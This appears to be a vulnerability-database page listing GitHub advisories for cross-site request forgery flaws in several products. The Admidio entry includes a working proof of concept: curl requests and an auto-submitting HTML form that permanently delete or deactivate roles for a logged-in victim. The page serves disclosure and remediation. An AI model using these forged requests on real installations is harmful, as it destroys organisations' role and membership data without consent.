CWE-352
AllowedCross-Site Request Forgery (CSRF)
Abstraction: Compound · Status: Stable
The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.
14161 vulnerabilities reference this CWE, most recent first.
GHSA-WWC6-QFQ2-FRHX
Vulnerability from github – Published: 2025-08-23 06:30 – Updated: 2025-08-23 06:30The Restore Permanently delete Post or Page Data plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the rp_dpo_dpa_ajax_dp_delete_data() function. This makes it possible for unauthenticated attackers to delete data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
{
"affected": [],
"aliases": [
"CVE-2025-7839"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-23T05:15:32Z",
"severity": "MODERATE"
},
"details": "The Restore Permanently delete Post or Page Data plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the rp_dpo_dpa_ajax_dp_delete_data() function. This makes it possible for unauthenticated attackers to delete data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
"id": "GHSA-wwc6-qfq2-frhx",
"modified": "2025-08-23T06:30:20Z",
"published": "2025-08-23T06:30:20Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7839"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/restore-permanently-delete-post-or-page-data/trunk/delete-store-file.php#L305"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/8ff9d034-3c6e-4f8f-a53e-86ad85cc10e6?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WWCP-82RF-3X93
Vulnerability from github – Published: 2022-05-17 02:36 – Updated: 2022-05-17 02:36Kibana Reporting plugin version 2.4.0 is vulnerable to a CSRF vulnerability that could allow an attacker to generate superfluous reports whenever an authenticated Kibana user navigates to a specially-crafted page.
{
"affected": [],
"aliases": [
"CVE-2016-1000218"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-06-16T21:29:00Z",
"severity": "HIGH"
},
"details": "Kibana Reporting plugin version 2.4.0 is vulnerable to a CSRF vulnerability that could allow an attacker to generate superfluous reports whenever an authenticated Kibana user navigates to a specially-crafted page.",
"id": "GHSA-wwcp-82rf-3x93",
"modified": "2022-05-17T02:36:13Z",
"published": "2022-05-17T02:36:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000218"
},
{
"type": "WEB",
"url": "https://www.elastic.co/community/security"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/99253"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WWF3-3R88-2Q8V
Vulnerability from github – Published: 2024-03-29 18:30 – Updated: 2025-03-13 03:30Cross-Site Request Forgery (CSRF) vulnerability in realmag777 HUSKY – Products Filter for WooCommerce (formerly WOOF).This issue affects HUSKY – Products Filter for WooCommerce (formerly WOOF): from n/a through 1.3.5.1.
{
"affected": [],
"aliases": [
"CVE-2024-30462"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-29T17:15:19Z",
"severity": "MODERATE"
},
"details": "Cross-Site Request Forgery (CSRF) vulnerability in realmag777 HUSKY \u2013 Products Filter for WooCommerce (formerly WOOF).This issue affects HUSKY \u2013 Products Filter for WooCommerce (formerly WOOF): from n/a through 1.3.5.1.",
"id": "GHSA-wwf3-3r88-2q8v",
"modified": "2025-03-13T03:30:51Z",
"published": "2024-03-29T18:30:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30462"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/woocommerce-products-filter/wordpress-husky-plugin-1-3-5-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WWF3-H2PC-PRC7
Vulnerability from github – Published: 2025-04-09 18:30 – Updated: 2026-04-01 18:34Cross-Site Request Forgery (CSRF) vulnerability in anantaddons Anant Addons for Elementor allows Cross Site Request Forgery. This issue affects Anant Addons for Elementor: from n/a through 1.1.5.
{
"affected": [],
"aliases": [
"CVE-2025-32641"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-04-09T17:15:49Z",
"severity": "CRITICAL"
},
"details": "Cross-Site Request Forgery (CSRF) vulnerability in anantaddons Anant Addons for Elementor allows Cross Site Request Forgery. This issue affects Anant Addons for Elementor: from n/a through 1.1.5.",
"id": "GHSA-wwf3-h2pc-prc7",
"modified": "2026-04-01T18:34:36Z",
"published": "2025-04-09T18:30:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32641"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/anant-addons-for-elementor/vulnerability/wordpress-anant-addons-for-elementor-plugin-1-1-5-csrf-to-arbitrary-plugin-installation-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WWFG-36P2-R558
Vulnerability from github – Published: 2022-05-24 16:55 – Updated: 2024-04-04 01:50{
"affected": [],
"aliases": [
"CVE-2019-10057"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-08-28T22:15:00Z",
"severity": "MODERATE"
},
"details": "Various Lexmark products have CSRF.",
"id": "GHSA-wwfg-36p2-r558",
"modified": "2024-04-04T01:50:28Z",
"published": "2022-05-24T16:55:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10057"
},
{
"type": "WEB",
"url": "http://support.lexmark.com/index?page=content\u0026id=TE921\u0026locale=EN\u0026userlocale=EN_US"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WWG8-6FFR-H4Q2
Vulnerability from github – Published: 2026-03-16 21:17 – Updated: 2026-03-20 21:15Summary
The delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST["adm_csrf_token"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data.
Details
CSRF Token Is Sent but Never Validated
File: D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php, lines 150-173
The save mode (lines 143-148) is CSRF-protected via RolesService::save() which calls getFormObject($_POST["adm_csrf_token"])->validate(). The delete, activate, and deactivate modes receive no equivalent protection:
case 'delete':
// delete role from database
$role = new Role($gDb);
$role->readDataByUuid($getRoleUUID);
if ($role->delete()) {
echo json_encode(array('status' => 'success'));
}
break;
case 'activate':
// set role active
$role = new Role($gDb);
$role->readDataByUuid($getRoleUUID);
$role->activate();
echo 'done';
break;
case 'deactivate':
// set role inactive
$role = new Role($gDb);
$role->readDataByUuid($getRoleUUID);
$role->deactivate();
echo 'done';
break;
The only input validated is $getRoleUUID at line 41, checked as a 'uuid' type. This prevents SQL injection but provides no CSRF protection.
Client-Side UI Passes Token; Server Ignores It
File: D:/bugcrowd/admidio/repo/system/js/common_functions.js, lines 101-129
The presenter embeds the CSRF token into the JavaScript callUrlHideElement() call (GroupsRolesPresenter.php line 131). The function sends it in an AJAX POST body:
function callUrlHideElement(elementId, url, csrfToken, callback) {
$.post(url, {
"adm_csrf_token": csrfToken, // sent in POST body
"uuid": elementId
}, function(data) { ... });
}
The server-side handler reads mode from $_GET but never reads or validates $_POST["adm_csrf_token"] for delete, activate, or deactivate. An attacker omits the token field entirely; the server does not check for its presence.
Who Can Be the CSRF Victim
File: D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php, lines 49-54
if ($getMode !== 'cards') {
// only users with the special right are allowed to manage roles
if (!$gCurrentUser->isAdministratorRoles()) {
throw new Exception('SYS_NO_RIGHTS');
}
}
isAdministratorRoles() maps to checkRolesRight('rol_assign_roles'). This is a delegated organizational right, not full system administrator (isAdministrator()) access. Any member granted the right to manage roles -- for example, a volunteer coordinator or chapter secretary -- is a valid CSRF victim.
Role UUIDs Are Discoverable Without Authentication
File: D:/bugcrowd/admidio/repo/src/UI/Presenter/GroupsRolesPresenter.php, line 84
$templateRow['id'] = 'role_' . $role->getValue('rol_uuid');
The cards mode (the default view) does not require the rol_assign_roles right and is publicly reachable when the module is enabled. Role UUIDs appear as HTML element IDs and in action data attributes in the page source. An unauthenticated visitor can collect all role UUIDs before staging the CSRF attack against a logged-in victim.
Role::delete() Is Permanent and Cascading
File: D:/bugcrowd/admidio/repo/src/Roles/Entity/Role.php, lines 264-288
$this->db->startTransaction();
// Remove all role dependency relationships
$sql = 'DELETE FROM ' . TBL_ROLE_DEPENDENCIES . ' WHERE rld_rol_id_parent = ? OR rld_rol_id_child = ?';
$this->db->queryPrepared($sql, array($rolId, $rolId));
// Remove all memberships
$sql = 'DELETE FROM ' . TBL_MEMBERS . ' WHERE mem_rol_id = ?';
$this->db->queryPrepared($sql, array($rolId));
// Disassociate all events linked to this role
$sql = 'UPDATE ' . TBL_EVENTS . ' SET dat_rol_id = NULL WHERE dat_rol_id = ?';
$this->db->queryPrepared($sql, array($rolId));
// Remove all access-right entries for this role
$sql = 'DELETE FROM ' . TBL_ROLES_RIGHTS_DATA . ' WHERE rrd_rol_id = ?';
$this->db->queryPrepared($sql, array($rolId));
There is no soft-delete or recycle bin. Deletion permanently removes the role record, all memberships within it, all role dependency rules, and all per-module access rights granted to the role.
PoC
The attacker hosts the following HTML page and tricks a user with the rol_assign_roles right into visiting it while logged in to Admidio.
Step 1: Collect role UUIDs from the public cards view (no login required)
curl "https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=cards"
Role UUIDs appear in the HTML source as element IDs (id="role_<UUID>") and in action data attributes.
Step 2: Forge a deletion request (no CSRF token needed)
curl -X POST \\
"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=delete&role_uuid=ROLE_UUID" \\
-H "Cookie: ADMIDIO_SESSION_ID=victim_session" \\
-d ""
Expected response: {"status":"success"}
The role, all its memberships, all event associations, and all access-right entries are permanently deleted. No adm_csrf_token field is required.
Step 3 (CSRF delivery -- attacker hosts externally)
<!DOCTYPE html>
<html>
<body onload="document.getElementById('f').submit()">
<form id="f" method="POST"
action="https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=delete&role_uuid=ROLE_UUID">
<!-- No adm_csrf_token field needed -->
</form>
</body>
</html>
When any user with rol_assign_roles views this page while authenticated, the targeted role is permanently deleted without any confirmation from the victim.
Step 4 (Deactivate via CSRF -- disables a role without deleting it)
<form id="f" method="POST"
action="https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=deactivate&role_uuid=ROLE_UUID">
</form>
Deactivating a role removes all active members from the role and hides it, effectively revoking access for all members without destroying the role record.
Impact
- Permanent Role Deletion: A CSRF-triggered
deleterequest irrecoverably removes the targeted role and all associated memberships, event links, and permission grants. There is no undo path other than a database restore. - Mass Membership Revocation: Every member of the deleted role loses their membership record simultaneously. Role membership in Admidio controls access to events, document folders, mailing lists, and custom profile-field visibility.
- Role State Manipulation: An attacker can force
activateordeactivateon any role. Deactivation silently strips access from an entire group without deleting the role record. - Low Attack Surface Requirement: The attacker only needs to trick a user with the delegated
rol_assign_rolesright -- not a full system administrator. Such users are common in organizations that delegate group management to department heads or committee chairs. - UUID Pre-Collection Without Authentication: Role UUIDs are harvested from the public cards view before the CSRF attack is staged, making target selection trivial.
Recommended Fix
Add SecurityUtils::validateCsrfToken($_POST["adm_csrf_token"]) at the beginning of each vulnerable case, consistent with how other mutative actions in the codebase are protected.
// File: modules/groups-roles/groups_roles.php
case 'delete':
SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
$role = new Role($gDb);
$role->readDataByUuid($getRoleUUID);
if ($role->delete()) {
echo json_encode(array('status' => 'success'));
}
break;
case 'activate':
SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
$role = new Role($gDb);
$role->readDataByUuid($getRoleUUID);
$role->activate();
echo 'done';
break;
case 'deactivate':
SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
$role = new Role($gDb);
$role->readDataByUuid($getRoleUUID);
$role->deactivate();
echo 'done';
break;
Since callUrlHideElement already sends adm_csrf_token in the POST body, adding the server-side validation call is a one-line fix per case and requires no changes to the front-end JavaScript or templates.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.0.6"
},
"package": {
"ecosystem": "Packagist",
"name": "admidio/admidio"
},
"ranges": [
{
"events": [
{
"introduced": "5.0.0"
},
{
"fixed": "5.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32816"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-16T21:17:09Z",
"nvd_published_at": "2026-03-19T23:16:44Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nThe `delete`, `activate`, and `deactivate` modes in `modules/groups-roles/groups_roles.php` perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to `callUrlHideElement()`, which includes it in the POST body, but the server-side handlers ignore `$_POST[\"adm_csrf_token\"]` entirely for these three modes. An attacker who can discover a role UUID (visible in the public `cards` view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the `rol_assign_roles` right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data.\n\n## Details\n\n### CSRF Token Is Sent but Never Validated\n\nFile: `D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php`, lines 150-173\n\nThe `save` mode (lines 143-148) is CSRF-protected via `RolesService::save()` which calls `getFormObject($_POST[\"adm_csrf_token\"])-\u003evalidate()`. The `delete`, `activate`, and `deactivate` modes receive no equivalent protection:\n\n```php\ncase \u0027delete\u0027:\n // delete role from database\n $role = new Role($gDb);\n $role-\u003ereadDataByUuid($getRoleUUID);\n if ($role-\u003edelete()) {\n echo json_encode(array(\u0027status\u0027 =\u003e \u0027success\u0027));\n }\n break;\n\ncase \u0027activate\u0027:\n // set role active\n $role = new Role($gDb);\n $role-\u003ereadDataByUuid($getRoleUUID);\n $role-\u003eactivate();\n echo \u0027done\u0027;\n break;\n\ncase \u0027deactivate\u0027:\n // set role inactive\n $role = new Role($gDb);\n $role-\u003ereadDataByUuid($getRoleUUID);\n $role-\u003edeactivate();\n echo \u0027done\u0027;\n break;\n```\n\nThe only input validated is `$getRoleUUID` at line 41, checked as a `\u0027uuid\u0027` type. This prevents SQL injection but provides no CSRF protection.\n\n### Client-Side UI Passes Token; Server Ignores It\n\nFile: `D:/bugcrowd/admidio/repo/system/js/common_functions.js`, lines 101-129\n\nThe presenter embeds the CSRF token into the JavaScript `callUrlHideElement()` call (GroupsRolesPresenter.php line 131). The function sends it in an AJAX POST body:\n\n```javascript\nfunction callUrlHideElement(elementId, url, csrfToken, callback) {\n $.post(url, {\n \"adm_csrf_token\": csrfToken, // sent in POST body\n \"uuid\": elementId\n }, function(data) { ... });\n}\n```\n\nThe server-side handler reads `mode` from `$_GET` but never reads or validates `$_POST[\"adm_csrf_token\"]` for `delete`, `activate`, or `deactivate`. An attacker omits the token field entirely; the server does not check for its presence.\n\n### Who Can Be the CSRF Victim\n\nFile: `D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php`, lines 49-54\n\n```php\nif ($getMode !== \u0027cards\u0027) {\n // only users with the special right are allowed to manage roles\n if (!$gCurrentUser-\u003eisAdministratorRoles()) {\n throw new Exception(\u0027SYS_NO_RIGHTS\u0027);\n }\n}\n```\n\n`isAdministratorRoles()` maps to `checkRolesRight(\u0027rol_assign_roles\u0027)`. This is a delegated organizational right, not full system administrator (`isAdministrator()`) access. Any member granted the right to manage roles -- for example, a volunteer coordinator or chapter secretary -- is a valid CSRF victim.\n\n### Role UUIDs Are Discoverable Without Authentication\n\nFile: `D:/bugcrowd/admidio/repo/src/UI/Presenter/GroupsRolesPresenter.php`, line 84\n\n```php\n$templateRow[\u0027id\u0027] = \u0027role_\u0027 . $role-\u003egetValue(\u0027rol_uuid\u0027);\n```\n\nThe `cards` mode (the default view) does not require the `rol_assign_roles` right and is publicly reachable when the module is enabled. Role UUIDs appear as HTML element IDs and in action data attributes in the page source. An unauthenticated visitor can collect all role UUIDs before staging the CSRF attack against a logged-in victim.\n\n### Role::delete() Is Permanent and Cascading\n\nFile: `D:/bugcrowd/admidio/repo/src/Roles/Entity/Role.php`, lines 264-288\n\n```php\n$this-\u003edb-\u003estartTransaction();\n\n// Remove all role dependency relationships\n$sql = \u0027DELETE FROM \u0027 . TBL_ROLE_DEPENDENCIES . \u0027 WHERE rld_rol_id_parent = ? OR rld_rol_id_child = ?\u0027;\n$this-\u003edb-\u003equeryPrepared($sql, array($rolId, $rolId));\n\n// Remove all memberships\n$sql = \u0027DELETE FROM \u0027 . TBL_MEMBERS . \u0027 WHERE mem_rol_id = ?\u0027;\n$this-\u003edb-\u003equeryPrepared($sql, array($rolId));\n\n// Disassociate all events linked to this role\n$sql = \u0027UPDATE \u0027 . TBL_EVENTS . \u0027 SET dat_rol_id = NULL WHERE dat_rol_id = ?\u0027;\n$this-\u003edb-\u003equeryPrepared($sql, array($rolId));\n\n// Remove all access-right entries for this role\n$sql = \u0027DELETE FROM \u0027 . TBL_ROLES_RIGHTS_DATA . \u0027 WHERE rrd_rol_id = ?\u0027;\n$this-\u003edb-\u003equeryPrepared($sql, array($rolId));\n```\n\nThere is no soft-delete or recycle bin. Deletion permanently removes the role record, all memberships within it, all role dependency rules, and all per-module access rights granted to the role.\n\n## PoC\n\nThe attacker hosts the following HTML page and tricks a user with the `rol_assign_roles` right into visiting it while logged in to Admidio.\n\n**Step 1: Collect role UUIDs from the public cards view (no login required)**\n\n```\ncurl \"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=cards\"\n```\n\nRole UUIDs appear in the HTML source as element IDs (`id=\"role_\u003cUUID\u003e\"`) and in action data attributes.\n\n**Step 2: Forge a deletion request (no CSRF token needed)**\n\n```\ncurl -X POST \\\\\n \"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=delete\u0026role_uuid=ROLE_UUID\" \\\\\n -H \"Cookie: ADMIDIO_SESSION_ID=victim_session\" \\\\\n -d \"\"\n```\n\nExpected response: `{\"status\":\"success\"}`\n\nThe role, all its memberships, all event associations, and all access-right entries are permanently deleted. No `adm_csrf_token` field is required.\n\n**Step 3 (CSRF delivery -- attacker hosts externally)**\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003cbody onload=\"document.getElementById(\u0027f\u0027).submit()\"\u003e\n \u003cform id=\"f\" method=\"POST\"\n action=\"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=delete\u0026role_uuid=ROLE_UUID\"\u003e\n \u003c!-- No adm_csrf_token field needed --\u003e\n \u003c/form\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\nWhen any user with `rol_assign_roles` views this page while authenticated, the targeted role is permanently deleted without any confirmation from the victim.\n\n**Step 4 (Deactivate via CSRF -- disables a role without deleting it)**\n\n```html\n\u003cform id=\"f\" method=\"POST\"\n action=\"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=deactivate\u0026role_uuid=ROLE_UUID\"\u003e\n\u003c/form\u003e\n```\n\nDeactivating a role removes all active members from the role and hides it, effectively revoking access for all members without destroying the role record.\n\n## Impact\n\n- **Permanent Role Deletion:** A CSRF-triggered `delete` request irrecoverably removes the targeted role and all associated memberships, event links, and permission grants. There is no undo path other than a database restore.\n- **Mass Membership Revocation:** Every member of the deleted role loses their membership record simultaneously. Role membership in Admidio controls access to events, document folders, mailing lists, and custom profile-field visibility.\n- **Role State Manipulation:** An attacker can force `activate` or `deactivate` on any role. Deactivation silently strips access from an entire group without deleting the role record.\n- **Low Attack Surface Requirement:** The attacker only needs to trick a user with the delegated `rol_assign_roles` right -- not a full system administrator. Such users are common in organizations that delegate group management to department heads or committee chairs.\n- **UUID Pre-Collection Without Authentication:** Role UUIDs are harvested from the public cards view before the CSRF attack is staged, making target selection trivial.\n\n## Recommended Fix\n\nAdd `SecurityUtils::validateCsrfToken($_POST[\"adm_csrf_token\"])` at the beginning of each vulnerable case, consistent with how other mutative actions in the codebase are protected.\n\n```php\n// File: modules/groups-roles/groups_roles.php\n\ncase \u0027delete\u0027:\n SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n $role = new Role($gDb);\n $role-\u003ereadDataByUuid($getRoleUUID);\n if ($role-\u003edelete()) {\n echo json_encode(array(\u0027status\u0027 =\u003e \u0027success\u0027));\n }\n break;\n\ncase \u0027activate\u0027:\n SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n $role = new Role($gDb);\n $role-\u003ereadDataByUuid($getRoleUUID);\n $role-\u003eactivate();\n echo \u0027done\u0027;\n break;\n\ncase \u0027deactivate\u0027:\n SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n $role = new Role($gDb);\n $role-\u003ereadDataByUuid($getRoleUUID);\n $role-\u003edeactivate();\n echo \u0027done\u0027;\n break;\n```\n\nSince `callUrlHideElement` already sends `adm_csrf_token` in the POST body, adding the server-side validation call is a one-line fix per case and requires no changes to the front-end JavaScript or templates.",
"id": "GHSA-wwg8-6ffr-h4q2",
"modified": "2026-03-20T21:15:34Z",
"published": "2026-03-16T21:17:09Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-wwg8-6ffr-h4q2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32816"
},
{
"type": "PACKAGE",
"url": "https://github.com/Admidio/admidio"
},
{
"type": "WEB",
"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Admidio is Missing CSRF Validation on Role Delete, Activate, and Deactivate Actions"
}
GHSA-WWG8-X274-5X5G
Vulnerability from github – Published: 2024-06-06 18:30 – Updated: 2024-06-06 18:30A Cross-Site Request Forgery (CSRF) vulnerability in significant-gravitas/autogpt version v0.5.0 allows attackers to execute arbitrary commands on the AutoGPT server. The vulnerability stems from the lack of protections on the API endpoint receiving instructions, enabling an attacker to direct a user running AutoGPT in their local network to a malicious website. This site can then send crafted requests to the AutoGPT server, leading to command execution. The issue is exacerbated by CORS being enabled for arbitrary origins by default, allowing the attacker to read the response of all cross-site queries. This vulnerability was addressed in version 5.1.
{
"affected": [],
"aliases": [
"CVE-2024-1879"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-06T18:15:12Z",
"severity": "HIGH"
},
"details": "A Cross-Site Request Forgery (CSRF) vulnerability in significant-gravitas/autogpt version v0.5.0 allows attackers to execute arbitrary commands on the AutoGPT server. The vulnerability stems from the lack of protections on the API endpoint receiving instructions, enabling an attacker to direct a user running AutoGPT in their local network to a malicious website. This site can then send crafted requests to the AutoGPT server, leading to command execution. The issue is exacerbated by CORS being enabled for arbitrary origins by default, allowing the attacker to read the response of all cross-site queries. This vulnerability was addressed in version 5.1.",
"id": "GHSA-wwg8-x274-5x5g",
"modified": "2024-06-06T18:30:55Z",
"published": "2024-06-06T18:30:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1879"
},
{
"type": "WEB",
"url": "https://github.com/significant-gravitas/autogpt/commit/26324f29849967fa72c207da929af612f1740669"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/125c2d0c-0481-4e5c-ae90-fec263acdf32"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WWGP-82C5-FMMH
Vulnerability from github – Published: 2025-03-05 09:30 – Updated: 2025-03-05 09:30The I Am Gloria plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.4. This is due to missing or incorrect nonce validation on the iamgloria23_gloria_settings_page function. This makes it possible for unauthenticated attackers to reset the tenant ID via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
{
"affected": [],
"aliases": [
"CVE-2025-0990"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-05T09:15:09Z",
"severity": "MODERATE"
},
"details": "The I Am Gloria plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.4. This is due to missing or incorrect nonce validation on the iamgloria23_gloria_settings_page function. This makes it possible for unauthenticated attackers to reset the tenant ID via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
"id": "GHSA-wwgp-82c5-fmmh",
"modified": "2025-03-05T09:30:52Z",
"published": "2025-03-05T09:30:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0990"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/gloria-assistant-by-webtronic-labs"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/33fd44dc-b4f8-4429-8dcd-5161602bb318?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-WWGQ-9JHF-QGW6
Vulnerability from github – Published: 2021-11-18 15:46 – Updated: 2021-11-17 21:08Impact
Due to improperly configured CSRF protections on two routes, a malicious user could execute a CSRF-based attack against the following endpoints:
- Sending a test email.
- Generating a node auto-deployment token.
At no point would any data be exposed to the malicious user, this would simply trigger email spam to an administrative user, or generate a single auto-deployment token unexpectedly. This token is not revealed to the malicious user, it is simply created unexpectedly in the system.
Patches
This has been addressed in https://github.com/pterodactyl/panel/commit/bf9cbe2c6d5266c6914223e067c56175de7fc3a5 which will be released as 1.6.6.
Workarounds
Users may optionally manually apply the fixes released in v1.6.6 to patch their own systems.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "pterodactyl/panel"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-41273"
],
"database_specific": {
"cwe_ids": [
"CWE-352"
],
"github_reviewed": true,
"github_reviewed_at": "2021-11-17T14:37:10Z",
"nvd_published_at": "2021-11-17T20:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\nDue to improperly configured CSRF protections on two routes, a malicious user could execute a CSRF-based attack against the following endpoints:\n\n* Sending a test email.\n* Generating a node auto-deployment token.\n\nAt no point would any data be exposed to the malicious user, this would simply trigger email spam to an administrative user, or generate a single auto-deployment token unexpectedly. This token is not revealed to the malicious user, it is simply created unexpectedly in the system.\n\n### Patches\nThis has been addressed in https://github.com/pterodactyl/panel/commit/bf9cbe2c6d5266c6914223e067c56175de7fc3a5 which will be released as `1.6.6`.\n\n### Workarounds\nUsers may optionally manually apply the fixes released in v1.6.6 to patch their own systems.\n",
"id": "GHSA-wwgq-9jhf-qgw6",
"modified": "2021-11-17T21:08:25Z",
"published": "2021-11-18T15:46:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pterodactyl/panel/security/advisories/GHSA-wwgq-9jhf-qgw6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41273"
},
{
"type": "WEB",
"url": "https://github.com/pterodactyl/panel/commit/bf9cbe2c6d5266c6914223e067c56175de7fc3a5"
},
{
"type": "PACKAGE",
"url": "https://github.com/pterodactyl/panel"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Cross-Site Request Forgery allowing sending of test emails and generation of node auto-deployment keys"
}
GHSA-WWJ4-PQG8-68WR
